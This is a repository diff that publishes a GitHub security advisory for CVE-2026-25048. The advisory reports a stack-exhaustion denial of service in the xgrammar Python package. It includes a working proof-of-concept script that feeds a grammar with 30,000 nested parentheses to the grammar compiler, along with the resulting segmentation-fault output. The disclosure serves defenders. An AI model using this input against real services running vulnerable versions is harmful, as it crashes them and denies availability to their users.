Publish GHSA-7rgv-gqhr-fxg3

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-7rgv-gqhr-fxg3/GHSA-7rgv-gqhr-fxg3.json

@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7rgv-gqhr-fxg3",
+  "modified": "2026-03-05T18:20:08Z",
+  "published": "2026-03-05T18:20:08Z",
+  "aliases": [
+    "CVE-2026-25048"
+  ],
+  "summary": "xgrammar vulnerable to DoS via multi-layer nesting",
+  "details": "### Summary\n\nThe multi-level nested syntax caused a segmentation fault (core dump).\n\n\n### Details\n\nA trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.\n\n### PoC\n\n```\n#!/usr/bin/env python3\n\"\"\"\nXGrammar - Math Expression Generation Example\n\"\"\"\n\nimport xgrammar as xgr\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig\n\ns = '(' * 30000 + 'a'\ngrammar = f\"root ::= {s}\"\n\ndef main():\n    device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n    model_name = \"Qwen/Qwen2.5-0.5B-Instruct\"\n    \n    # Load model\n    model = AutoModelForCausalLM.from_pretrained(\n        model_name,\n        torch_dtype=torch.float16 if device == \"cuda\" else torch.float32,\n        device_map=device\n    )\n    tokenizer = AutoTokenizer.from_pretrained(model_name)\n    config = AutoConfig.from_pretrained(model_name)\n    \n    # Math expression grammar\n    math_grammar = grammar\n    \n    # Setup\n    tokenizer_info = xgr.TokenizerInfo.from_huggingface(\n        tokenizer,\n        vocab_size=config.vocab_size\n    )\n    compiler = xgr.GrammarCompiler(tokenizer_info)\n    compiled_grammar = compiler.compile_grammar(math_grammar)\n    \n    # Generate\n    prompt = \"Math: \"\n    inputs = tokenizer(prompt, return_tensors=\"pt\").to(device)\n    \n    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)\n    \n    output_ids = model.generate(\n        **inputs,\n        max_new_tokens=50,\n        logits_processor=[xgr_processor]\n    )\n    \n    result = tokenizer.decode(\n        output_ids[0][len(inputs.input_ids[0]):],\n        skip_special_tokens=True\n    )\n    \n    print(f\"Generated expression: {result}\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\n\n```\n> pip show xgrammar\nName: xgrammar\nVersion: 0.1.31\nSummary: Efficient, Flexible and Portable Structured Generation\nHome-page: \nAuthor: MLC Team\nAuthor-email: \nLicense: Apache 2.0\nLocation: /home/yuelinwang/.local/lib/python3.10/site-packages\nRequires: numpy, pydantic, torch, transformers, triton, typing-extensions\nRequired-by: \n\n> python3 1.py \n`torch_dtype` is deprecated! Use `dtype` instead!\nSegmentation fault (core dumped)\n```\n\n\n### Impact\n\nDoS",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "xgrammar"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.1.32"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.1.31"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-7rgv-gqhr-fxg3"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/mlc-ai/xgrammar"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/mlc-ai/xgrammar/releases/tag/v0.1.32"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-674"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-05T18:20:08Z",
+    "nvd_published_at": null
+  }
+}